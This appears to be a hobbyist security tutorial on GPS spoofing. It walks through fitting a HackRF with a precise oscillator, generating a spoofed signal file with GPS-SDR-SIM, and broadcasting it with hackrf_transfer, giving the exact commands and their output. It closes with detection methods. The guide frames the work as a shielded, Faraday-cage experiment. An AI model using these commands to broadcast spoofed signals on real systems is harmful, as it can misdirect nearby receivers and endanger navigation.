GPS Signal Spoofing

Introduction

The Global Positioning System (GPS) determines the location of a receiver using a network of satellites and ground stations.

The GPS satellites orbiting the Earth continuously send out signals that include their location and the exact time the signals are transmitted.

A GPS receiver on the ground picks up signals from multiple satellites. To find its position accurately, the receiver needs signals from several of these satellites.

Using the time it takes for the signals to reach it, the receiver calculates how far away each satellite is. With this distance information from different satellites, the receiver can determine its exact location through a method called trilateration.

Ground stations help maintain the system by monitoring the satellites and correcting any timing inaccuracies, ensuring the signals remain precise.

Being a radio technology, an if an adversary is able to send their signal to receivers at a greater power level than the satellites themselves, they could send false location information being provided.

It’s worth noting that this type of experiment should only be conducted in a highly controlled environment – i.e, within a Faraday cage to prevent signal leakage, as spoofing GPS signals is illegal in most countries.


Hardware Required

To spoof GPS signals, we’re using a HackRF software defined radio. Without a case, it looks something like this.

The clock included with the HackRF isn’t accurate enough for GPS spoofing. To address this we need to install a new crystal oscillator, in this case a temperature compensated crystal oscillator (TCXO). The chip itself will look something like this.

When procuring a TCXO for the HackRF, be aware it may not fit into a case depending on it’s size. Below is the HackRF with the chip installed..

You will also need an antenna which is suitable for operating on the GPS frequencies. (1575.42 MHz for L1 and 1227.60 MHz for L2). The antenna used operates between 700Mhz-2700Mhz.


Download the Ephemeris Data

GPS ephemeris is a set of data that provides the precise orbit of a GPS satellite, which is used to calculate the satellite’s position and velocity. The ephemeris includes information about the satellite’s position, the orientation of its orbital plane, and the size and shape of its orbit.

NASA publish the latest set of ephemeris that can be downloaded here: https://urs.earthdata.nasa.gov. The site requires a free login, but is available to anyone. Navigate to the current year, then the last day and you should end up in a folder like this. Download the .gz file.


Generating Spoofed data with GPS-SDR-SIM

To generate a spoofed signal, we can use GPS-SDR-SIM. The software can be downloaded from here: https://github.com/osqzss/gps-sdr-sim.

Next, start a new C++ Visual Studio project and import only the following files from the downloaded source code, and compile the application.

Run the gps-sdr-sim application, specifying the ephemeris file and the latitude, longitude and height.

gps-sdr-sim -e brdc3040.24n -b 8 -l 37.826609553763184,-122.42281714230772,100
Using static location mode.
xyz =  -2704585.2,  -4257995.4,   3890321.8
llh =   37.826610, -122.422817,       100.0
Start time = 2024/10/30,00:00:00 (2338:259200)
Duration = 300.0 [sec]
04  144.2   5.9  25048587.1  36.3
05  294.2  18.3  23786966.7  27.9
07   57.8  60.8  21089058.3  13.3
08   59.6  32.5  22392187.9  19.7
09  153.5  34.2  22407239.7  19.9
13  316.1  18.0  23685222.6  27.5
14  239.3  53.3  21304131.8  14.8
17  182.7   8.1  24584522.7  36.0
20  262.2  16.4  23984162.2  29.7
22  231.8  31.7  22497864.4  21.3
27   36.8   8.6  24607495.1  30.2
30  333.8  66.1  20738908.0  12.9
Time into run = 300.0
Done!
Process time = 37.5 [sec]

Once complete, a gpssim.bin file should be generated in the same directory.


Signal Transmission

Next we just need to use hackrf_transfer to transmit the gpssim.bin file which has been generated. The easiest way to get the hackrf_transfer command is to download the following installer: https://github.com/pothosware/PothosCore/wiki/Downloads#windows-installer

Sending the spoofed gpssim.bin file can then be done using the following command:

hackrf_transfer -t gpssim.bin -f 1575420000 -s 2600000 -a 1 -x 0
call hackrf_set_sample_rate(2600000 Hz/2.600 MHz)
call hackrf_set_hw_sync_mode(0)
call hackrf_set_freq(1575420000 Hz/1575.420 MHz)
call hackrf_set_amp_enable(1)
Stop with Ctrl-C
 5.2 MiB / 1.021 sec =  5.1 MiB/second, amplitude -inf dBfs
 5.2 MiB / 1.002 sec =  5.2 MiB/second, amplitude -inf dBfs
 5.2 MiB / 1.016 sec =  5.2 MiB/second, amplitude -inf dBfs
 5.2 MiB / 1.005 sec =  5.2 MiB/second, amplitude -inf dBfs
 5.2 MiB / 1.007 sec =  5.2 MiB/second, amplitude -inf dBfs
...

Checking Google maps on a nearby Android device, we can see we have been transported to Alacatraz Island.


In Conclusion

Preventing signal spoofing is normally done through multi band receivers, i.e – checking additional satellite networks such as GLONASS, Galileo, BeiDou etc.

In addition, it should be noted that some locations implement spoofing detection, which can be done through a variety of methods including;

  • Signal strength monitoring – signals which are stronger than could be produced by a satellite are likely spoofed.
  • Angle of arrival analysis – signals should only be emitting from space.
  • Implementing cryptographic authentication.
  • Crowd sourced detection – verifying location data based on other sources, such as WiFi access points.